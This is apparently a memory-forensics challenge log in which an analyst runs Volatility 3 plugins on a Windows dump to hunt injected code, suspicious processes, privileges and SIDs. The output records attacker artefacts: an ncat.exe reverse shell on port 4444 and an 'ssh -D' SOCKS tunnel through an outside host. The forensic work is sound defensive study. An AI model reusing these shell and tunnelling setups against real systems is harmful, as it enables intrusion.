┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.netscan.NetScan > netscan.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat netstat.txt | grep EST 0xe78bf48cd010 TCPv4 10.0.0.108 4444 10.0.0.110 38159 ESTABLISHED - - - 0xe78bf533dac0 TCPv4 10.0.0.108 49957 10.0.0.110 443 ESTABLISHED - - N/A 0xe78bf4f0daa0 TCPv4 10.0.0.108 49685 10.0.0.101 4444 ESTABLISHED - - N/A 0xe78bf3ea6ae0 TCPv4 10.0.0.108 49686 10.0.0.110 22 ESTABLISHED - - N/A ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat netscan.txt | grep --perl-regexp '\s+4444\s+|\s+443\s+|\s+22\s+' 0xe78bf2daa340 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000 0xe78bf2daa340 TCPv6 :: 22 :: 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000 0xe78bf2daa4a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000 0xe78bf2daa600 TCPv6 ::1 9999 :: 0 LISTENING 4444 ssh.exe 2023-11-16 21:15:54.000000 0xe78bf2daa760 TCPv4 127.0.0.1 9999 0.0.0.0 0 LISTENING 4444 ssh.exe 2023-11-16 21:15:54.000000 0xe78bf3af4060 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000 0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000 0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pstree.txt | grep --perl-regexp '\s+896\s+' *** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A **** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A **** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pstree.txt | grep --perl-regexp '\s+7164\s+|\s+7072\s+' *** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A **** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000 **** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A **** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A ***** 1364 7072 conhost.exe 0xe78c05e54080 3 - 1 False 2023-11-16 23:01:17.000000 N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pstree.txt | grep --perl-regexp '\s+2460\s+|\s+4728\s+' *** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A **** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A **** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A **** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A **** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A **** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A **** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A **** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A **** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A ***** 6152 4728 cmd.exe 0xe78bf5caf0c0 1 - 1 False 2023-11-16 20:16:37.000000 N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pstree.txt | grep --perl-regexp '896' *** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A **** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A **** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A ** 5896 696 SgrmBroker.exe 0xe78bf3c9a080 7 - 0 False 2023-11-16 19:11:51.000000 N/A ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pstree.txt | grep --perl-regexp '896' >> suspicious_processes.txt ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pstree.txt | grep --perl-regexp '\s+7164\s+|\s+7072\s+' >> suspicious_processes.txt ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pstree.txt | grep --perl-regexp '\s+2460\s+|\s+4728\s+' >> suspicious_processes.txt ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ls suspicious_processes.txt suspicious_processes.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat suspicious_processes.txt *** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A **** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A **** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A ** 5896 696 SgrmBroker.exe 0xe78bf3c9a080 7 - 0 False 2023-11-16 19:11:51.000000 N/A *** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A **** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000 **** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A **** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A ***** 1364 7072 conhost.exe 0xe78c05e54080 3 - 1 False 2023-11-16 23:01:17.000000 N/A *** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A **** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A **** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A **** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A **** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A **** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A **** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A **** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A **** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A ***** 6152 4728 cmd.exe 0xe78bf5caf0c0 1 - 1 False 2023-11-16 20:16:37.000000 N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.cmdline.CmdLine > cmdline.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ grep --perl-regexp '896|8724|7164|5176|4940|7072|2460|644|4852|3032|4728|6152|4444|4668' cmdline.txt 5896 SgrmBroker.exe C:\Windows\system32\Sgrm\SgrmBroker.exe 7164 vmtoolsd.exe "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr 2460 WindowsTermina "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.12.10983.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe" 4728 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6152 cmd.exe Required memory at 0xb247af2020 is inaccessible (swapped) 4444 ssh.exe ssh -D 9999 kali@10.0.0.110 -N -vvv 644 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 4668 chrome.exe chrome.exe --proxy-server="socks5://127.0.0.1:9999" 4852 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3032 cmd.exe C:\Windows\System32\cmd.exe 5176 cmd.exe Required memory at 0x62a2d2020 is not valid (process exited?) 4940 cmd.exe C:\Windows\system32\cmd.exe 896 ncat.exe Required memory at 0x846628 is inaccessible (swapped) 8724 cmd.exe Required memory at 0x2f23020 is inaccessible (swapped) 7072 cmd.exe C:\Windows\system32\cmd.exe
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896 6148
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat suspicious_processes.txt | awk --field-separator=' ' '{ print $2 }' | tr '\n' ' ' 896 6148 8724 5896 7164 5176 4940 7072 1364 2460 644 2692 5736 2352 1684 4852 3032 4728 6152
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896 6148 8724 5896 7164 5176 4940 7072 1364 2460 644 2692 5736 2352 1684 4852 3032 4728 615 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished PID Process Start VPN End VPN Tag Protection CommitCharge PrivateMemory File output Hexdump Disasm 7164 vmtoolsd.exe 0x1b986d60000 0x1b986d91fff VadS PAGE_EXECUTE_READWRITE 50 1 Disabled 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 0x1b986d60000: add byte ptr [rax], al ... 7164 vmtoolsd.exe 0x1b987d90000 0x1b987dc1fff VadS PAGE_EXECUTE_READWRITE 50 1 Disabled 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 0x1b987d90000: add byte ptr [rax], al ... From above, it seems malicious code has been injected in the vmtoolds.exe process starting at memory address 0x1b986d60000 and ending at 0x1b986d91fff. We see "VadS", meaning there is no memory mapped file occuping this space. Similarly, we see below the suspicious code in Powershell with PID 4852 at 0x7df4d16b0000 4852 powershell.exe 0x7df4d16b0000 0x7df4d16bffff VadS PAGE_EXECUTE_READWRITE 1 1 Disabled 00 00 00 00 00 00 00 00 ........ 78 0d 00 00 00 00 00 00 x....... 0c 00 00 00 49 c7 c2 00 ....I... 00 00 00 48 b8 10 e8 16 ...H.... 4c f8 7f 00 00 ff e0 49 L......I c7 c2 01 00 00 00 48 b8 ......H. 10 e8 16 4c f8 7f 00 00 ...L.... ff e0 49 c7 c2 02 00 00 ..I..... 0x7df4d16b0000: add byte ptr [rax], al ...
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pstree.txt | grep --perl-regexp '7164|4852|2460' *** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A **** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000 **** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A **** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A *** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A **** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A **** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A **** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A **** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A **** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A **** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A **** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A **** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind --pid 7164 4852 --dump
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ls pid.* -l -rw------- 1 kali kali 65536 Nov 24 10:45 pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp -rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp -rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ clamscan pid.* Loading: 17s, ETA: 0s [========================>] 8.68M/8.68M sigs Compiling: 4s, ETA: 0s [========================>] 41/41 tasks /home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp: OK /home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp: OK /home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp: OK ----------- SCAN SUMMARY ----------- Known viruses: 8679505 Engine version: 1.0.1 Scanned directories: 0 Scanned files: 3 Infected files: 0 Data scanned: 0.52 MB Data read: 0.45 MB (ratio 1.16:1) Time: 23.106 sec (0 m 23 s) Start Date: 2023:11:24 11:43:10 End Date: 2023:11:24 11:43:33
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ls pid.* -l -rw------- 1 kali kali 65536 Nov 24 10:45 pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp -rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp -rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$mkdir pid 7164 ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ mkdir 4852
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir 7164/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles.DumpFiles --pid 7164 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result ImageSectionObject 0xe78bf4c4b390 mfc140enu.dll file.0xe78bf4c4b390.0xe78bf4724af0.ImageSectionObject.mfc140enu.dll.img DataSectionObject 0xe78bf448f8b0 oleaccrc.dll file.0xe78bf448f8b0.0xe78bf43a04f0.DataSectionObject.oleaccrc.dll.dat DataSectionObject 0xe78bf352b300 cversions.2.db file.0xe78bf352b300.0xe78bf32f71f0.DataSectionObject.cversions.2.db.dat DataSectionObject 0xe78bf352b300 cversions.2.db file.0xe78bf352b300.0xe78bf32f71f0.DataSectionObject.cversions.2.db.dat DataSectionObject 0xe78bf5512d10 msxml3r.dll file.0xe78bf5512d10.0xe78bf4f4d0b0.DataSectionObject.msxml3r.dll.dat DataSectionObject 0xe78bf2f8d770 crypt32.dll.mui file.0xe78bf2f8d770.0xe78bf2d3c570.DataSectionObject.crypt32.dll.mui.dat DataSectionObject 0xe78bf3529a00 msxml6r.dll file.0xe78bf3529a00.0xe78bf3a0d360.DataSectionObject.msxml6r.dll.dat .............. ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles.DumpFiles --pid 4852 | more Volatility 3 Framework 2.5.2 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xe78bf37c5b80 winnlsres.dll file.0xe78bf37c5b80.0xe78bf3a0d720.DataSectionObject.winnlsres.dll.dat DataSectionObject 0xe78bf37c5ea0 winnlsres.dll.mui file.0xe78bf37c5ea0.0xe78bf3a0d0e0.DataSectionObject.winnlsres.dll.mui.dat DataSectionObject 0xe78bf2f8d770 crypt32.dll.mui file.0xe78bf2f8d770.0xe78bf2d3c570.DataSectionObject.crypt32.dll.mui.dat ImageSectionObject 0xe78bf3fe36a0 System.Numerics.dll file.0xe78bf3fe36a0.0xe78bf0fd2210.ImageSectionObject.System.Numerics.dll.img ImageSectionObject 0xe78bf5523b60 Microsoft.PowerShell.PSReadLine.dll file.0xe78bf5523b60.0xe78bf2ed1d00.ImageSectionObject.Microsoft.PowerShe ll.PSReadLine.dll.img ...........................
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ sudo freshclam --show-progress Thu Dec 14 10:13:04 2023 -> ClamAV update process started at Thu Dec 14 10:13:04 2023 Thu Dec 14 10:13:04 2023 -> daily.cld database is up-to-date (version: 27123, sigs: 2048780, f-level: 90, builder: raynman) Thu Dec 14 10:13:04 2023 -> main.cvd database is up-to-date (version: 62, sigs: 6647427, f-level: 90, builder: sigmgr) Thu Dec 14 10:13:04 2023 -> bytecode.cvd database is up-to-date (version: 334, sigs: 91, f-level: 90, builder: anvilleg)
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ clamscan 7164/* 4852/* Loading: 18s, ETA: 0s [========================>] 8.68M/8.68M sigs Compiling: 3s, ETA: 0s [========================>] 41/41 tasks
....
----------- SCAN SUMMARY ----------- Known viruses: 8680656 Engine version: 1.0.3 Scanned directories: 0 Scanned files: 232 Infected files: 0 Data scanned: 263.46 MB Data read: 297.22 MB (ratio 0.89:1) Time: 246.675 sec (4 m 6 s) Start Date: 2023:12:14 10:14:36 End Date: 2023:12:14 10:18:43
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ /volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 7164 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished PID Process Value Privilege Attributes Description 7164 vmtoolsd.exe 2 SeCreateTokenPrivilege Create a token object 7164 vmtoolsd.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token 7164 vmtoolsd.exe 4 SeLockMemoryPrivilege Lock pages in memory 7164 vmtoolsd.exe 5 SeIncreaseQuotaPrivilege Increase quotas 7164 vmtoolsd.exe 6 SeMachineAccountPrivilege Add workstations to the domain 7164 vmtoolsd.exe 7 SeTcbPrivilege Act as part of the operating system 7164 vmtoolsd.exe 8 SeSecurityPrivilege Manage auditing and security log 7164 vmtoolsd.exe 9 SeTakeOwnershipPrivilege Take ownership of files/objects 7164 vmtoolsd.exe 10 SeLoadDriverPrivilege Load and unload device drivers 7164 vmtoolsd.exe 11 SeSystemProfilePrivilege Profile system performance 7164 vmtoolsd.exe 12 SeSystemtimePrivilege Change the system time 7164 vmtoolsd.exe 13 SeProfileSingleProcessPrivilege Profile a single process 7164 vmtoolsd.exe 14 SeIncreaseBasePriorityPrivilege Increase scheduling priority 7164 vmtoolsd.exe 15 SeCreatePagefilePrivilege Create a pagefile 7164 vmtoolsd.exe 16 SeCreatePermanentPrivilege Create permanent shared objects 7164 vmtoolsd.exe 17 SeBackupPrivilege Backup files and directories 7164 vmtoolsd.exe 18 SeRestorePrivilege Restore files and directories 7164 vmtoolsd.exe 19 SeShutdownPrivilege Present Shut down the system 7164 vmtoolsd.exe 20 SeDebugPrivilege Debug programs 7164 vmtoolsd.exe 21 SeAuditPrivilege Generate security audits 7164 vmtoolsd.exe 22 SeSystemEnvironmentPrivilege Edit firmware environment values 7164 vmtoolsd.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories 7164 vmtoolsd.exe 24 SeRemoteShutdownPrivilege Force shutdown from a remote system 7164 vmtoolsd.exe 25 SeUndockPrivilege Present Remove computer from docking station 7164 vmtoolsd.exe 26 SeSyncAgentPrivilege Synch directory service data 7164 vmtoolsd.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation 7164 vmtoolsd.exe 28 SeManageVolumePrivilege Manage the files on a volume 7164 vmtoolsd.exe 29 SeImpersonatePrivilege Impersonate a client after authentication 7164 vmtoolsd.exe 30 SeCreateGlobalPrivilege Default Create global objects 7164 vmtoolsd.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller 7164 vmtoolsd.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object 7164 vmtoolsd.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications 7164 vmtoolsd.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock 7164 vmtoolsd.exe 35 SeCreateSymbolicLinkPrivilege Required to create a symbolic link 7164 vmtoolsd.exe 36 SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 4852 | sed '1,4d' 4852 powershell.exe 2 SeCreateTokenPrivilege Create a token object 4852 powershell.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token 4852 powershell.exe 4 SeLockMemoryPrivilege Lock pages in memory 4852 powershell.exe 5 SeIncreaseQuotaPrivilege Present Increase quotas 4852 powershell.exe 6 SeMachineAccountPrivilege Add workstations to the domain 4852 powershell.exe 7 SeTcbPrivilege Act as part of the operating system 4852 powershell.exe 8 SeSecurityPrivilege Present Manage auditing and security log 4852 powershell.exe 9 SeTakeOwnershipPrivilege Present Take ownership of files/objects 4852 powershell.exe 10 SeLoadDriverPrivilege Present Load and unload device drivers 4852 powershell.exe 11 SeSystemProfilePrivilege Present Profile system performance 4852 powershell.exe 12 SeSystemtimePrivilege Present Change the system time 4852 powershell.exe 13 SeProfileSingleProcessPrivilege Present Profile a single process 4852 powershell.exe 14 SeIncreaseBasePriorityPrivilege Present Increase scheduling priority 4852 powershell.exe 15 SeCreatePagefilePrivilege Present Create a pagefile 4852 powershell.exe 16 SeCreatePermanentPrivilege Create permanent shared objects 4852 powershell.exe 17 SeBackupPrivilege Present Backup files and directories 4852 powershell.exe 18 SeRestorePrivilege Present Restore files and directories 4852 powershell.exe 19 SeShutdownPrivilege Present Shut down the system 4852 powershell.exe 20 SeDebugPrivilege Present,Enabled Debug programs 4852 powershell.exe 21 SeAuditPrivilege Generate security audits 4852 powershell.exe 22 SeSystemEnvironmentPrivilege Present Edit firmware environment values 4852 powershell.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories 4852 powershell.exe 24 SeRemoteShutdownPrivilege Present Force shutdown from a remote system 4852 powershell.exe 25 SeUndockPrivilege Present Remove computer from docking station 4852 powershell.exe 26 SeSyncAgentPrivilege Synch directory service data 4852 powershell.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation 4852 powershell.exe 28 SeManageVolumePrivilege Present Manage the files on a volume 4852 powershell.exe 29 SeImpersonatePrivilege Present,Enabled,Default Impersonate a client after authentication 4852 powershell.exe 30 SeCreateGlobalPrivilege Present,Enabled,Default Create global objects 4852 powershell.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller 4852 powershell.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object 4852 powershell.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications 4852 powershell.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock 4852 powershell.exe 35 SeCreateSymbolicLinkPrivilege Present Required to create a symbolic link 4852 powershell.exe 36 SeDelegateSessionUserImpersonatePrivilege Present Obtain an impersonation token for another user in the same session.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 7164 | sed '1,4d' | wc --lines
35
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 4852 | sed '1,4d' | wc --lines
35
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids.GetSIDs --pid 7164 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished PID Process SID Name 7164 vmtoolsd.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik 7164 vmtoolsd.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users 7164 vmtoolsd.exe S-1-1-0 Everyone 7164 vmtoolsd.exe S-1-5-114 Local Account (Member of Administrators) 7164 vmtoolsd.exe S-1-5-32-544 Administrators 7164 vmtoolsd.exe S-1-5-32-545 Users 7164 vmtoolsd.exe S-1-5-4 Interactive 7164 vmtoolsd.exe S-1-2-1 Console Logon (Users who are logged onto the physical console) 7164 vmtoolsd.exe S-1-5-11 Authenticated Users 7164 vmtoolsd.exe S-1-5-15 This Organization 7164 vmtoolsd.exe S-1-5-113 Local Account 7164 vmtoolsd.exe S-1-5-5-0-1032752 Logon Session 7164 vmtoolsd.exe S-1-2-0 Local (Users with the ability to log in locally) 7164 vmtoolsd.exe S-1-5-64-10 NTLM Authentication 7164 vmtoolsd.exe S-1-16-8192 Medium Mandatory Level
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids.GetSIDs --pid 4852 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished PID Process SID Name 4852 powershell.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik 4852 powershell.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users 4852 powershell.exe S-1-1-0 Everyone 4852 powershell.exe S-1-5-114 Local Account (Member of Administrators) 4852 powershell.exe S-1-5-32-544 Administrators 4852 powershell.exe S-1-5-32-545 Users 4852 powershell.exe S-1-5-4 Interactive 4852 powershell.exe S-1-2-1 Console Logon (Users who are logged onto the physical console) 4852 powershell.exe S-1-5-11 Authenticated Users 4852 powershell.exe S-1-5-15 This Organization 4852 powershell.exe S-1-5-113 Local Account 4852 powershell.exe S-1-5-5-0-1032752 Logon Session 4852 powershell.exe S-1-2-0 Local (Users with the ability to log in locally) 4852 powershell.exe S-1-5-64-10 NTLM Authentication 4852 powershell.exe S-1-16-12288 High Mandatory Level
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.registry.hivelist.HiveList> hivelist.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat hivelist.txt | sed '1,4d' | wc --lines 42
